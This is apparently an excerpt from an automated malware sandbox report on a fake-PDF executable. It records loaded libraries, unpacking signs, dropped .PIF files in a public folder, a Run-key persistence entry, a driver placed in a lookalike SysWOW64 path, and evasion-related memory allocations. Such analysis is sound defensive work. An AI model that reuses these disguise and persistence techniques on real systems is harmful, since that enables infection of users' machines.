                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ??????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: tquery.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: sppwmi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: slc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: sppcext.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: winscard.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeStatic file information: File size 1362944 > 1048576
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B3A000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020AFD000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: xnxcxbpC.pif, 00000005.00000002.2693895580.0000000022BDE000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 00000005.00000003.2498473359.0000000022899000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 00000005.00000003.2495014448.00000000226E6000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 0000000C.00000003.2688158342.000000001CA49000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 0000000C.00000002.2793157112.000000001CD8E000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 0000000C.00000002.2793157112.000000001CBF0000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 0000000C.00000003.2678845723.000000001C891000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000003.2761966942.000000002C042000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000002.2863454058.000000002C3A0000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000002.2863454058.000000002C53E000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000003.2766996142.000000002C1F9000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: xnxcxbpC.pif, xnxcxbpC.pif, 0000000C.00000003.2688158342.000000001CA49000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 0000000C.00000002.2793157112.000000001CD8E000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 0000000C.00000002.2793157112.000000001CBF0000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 0000000C.00000003.2678845723.000000001C891000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000003.2761966942.000000002C042000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000002.2863454058.000000002C3A0000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000002.2863454058.000000002C53E000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000003.2766996142.000000002C1F9000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B3A000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234801484.0000000021A41000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234801484.0000000021A12000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2349827499.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020AFD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2349827499.00000000008FE000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462078533.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462078533.00000000008E2000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifUnpacked PE file: 5.2.xnxcxbpC.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifUnpacked PE file: 12.2.xnxcxbpC.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifUnpacked PE file: 18.2.xnxcxbpC.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;
                      Source: Yara matchFile source: 0.2.Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe.2cd0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000003.2127061894.000000007FB00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2294905471.000000007FBD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2253685238.0000000002406000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: xnxcxbpC.pif.0.drStatic PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CE87A0 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02CE87A0
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CD32FC push eax; ret 0_2_02CD3338
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CFC2FC push 02CFC367h; ret 0_2_02CFC35F
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CD635C push 02CD63B7h; ret 0_2_02CD63AF
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CD635A push 02CD63B7h; ret 0_2_02CD63AF
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CFC0AC push 02CFC125h; ret 0_2_02CFC11D
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CFC1F8 push 02CFC288h; ret 0_2_02CFC280
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CFC144 push 02CFC1ECh; ret 0_2_02CFC1E4
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CE86C0 push 02CE8702h; ret 0_2_02CE86FA
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CD6740 push 02CD6782h; ret 0_2_02CD677A
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CD673E push 02CD6782h; ret 0_2_02CD677A
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CDC4F4 push ecx; mov dword ptr [esp], edx0_2_02CDC4F9
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CEE5B4 push ecx; mov dword ptr [esp], edx0_2_02CEE5B9
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CDD528 push 02CDD554h; ret 0_2_02CDD54C
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CFBB6C push 02CFBD94h; ret 0_2_02CFBD8C
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CDCB6B push 02CDCCFAh; ret 0_2_02CDCCF2
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CDCB74 push 02CDCCFAh; ret 0_2_02CDCCF2
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CE68CE push 02CE697Bh; ret 0_2_02CE6973
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CE68D0 push 02CE697Bh; ret 0_2_02CE6973
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CE7894 push 02CE7911h; ret 0_2_02CE7909
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CEA91F push 02CEA958h; ret 0_2_02CEA950
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CE8918 push 02CE8950h; ret 0_2_02CE8948
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CE8916 push 02CE8950h; ret 0_2_02CE8948
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CEA920 push 02CEA958h; ret 0_2_02CEA950
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CE2EE8 push 02CE2F5Eh; ret 0_2_02CE2F56
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CE5E04 push ecx; mov dword ptr [esp], edx0_2_02CE5E06
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CE2FF4 push 02CE3041h; ret 0_2_02CE3039
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CE2FF3 push 02CE3041h; ret 0_2_02CE3039
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_0040D99D push esp; iretd 5_2_0040D99E
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_00416373 push ds; iretd 5_2_00416372
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_00416305 push ds; iretd 5_2_00416372
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_004163B1 push ds; iretd 5_2_00416372

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeFile created: C:\Users\Public\Libraries\Cpbxcxnx.PIFJump to dropped file
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeFile created: C:\Users\Public\Libraries\xnxcxbpC.pifJump to dropped file
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeFile created: \delivery confirmation forms - contact form ts4047117 pdf.exe
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeFile created: \delivery confirmation forms - contact form ts4047117 pdf.exe
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeFile created: \delivery confirmation forms - contact form ts4047117 pdf.exeJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeFile created: \delivery confirmation forms - contact form ts4047117 pdf.exeJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeFile created: C:\Users\Public\Libraries\Cpbxcxnx.PIFJump to dropped file
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeFile created: C:\Users\Public\Libraries\xnxcxbpC.pifJump to dropped file
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CpbxcxnxJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CpbxcxnxJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CEA95C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_02CEA95C
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFMemory allocated: 2BC0000 memory commit 500006912Jump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFMemory allocated: 2BC1000 memory commit 500178944Jump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFMemory allocated: 2BEC000 memory commit 500002816Jump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFMemory allocated: 2BED000 memory commit 500199424Jump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFMemory allocated: 2C1E000 memory commit 501014528Jump to behavior
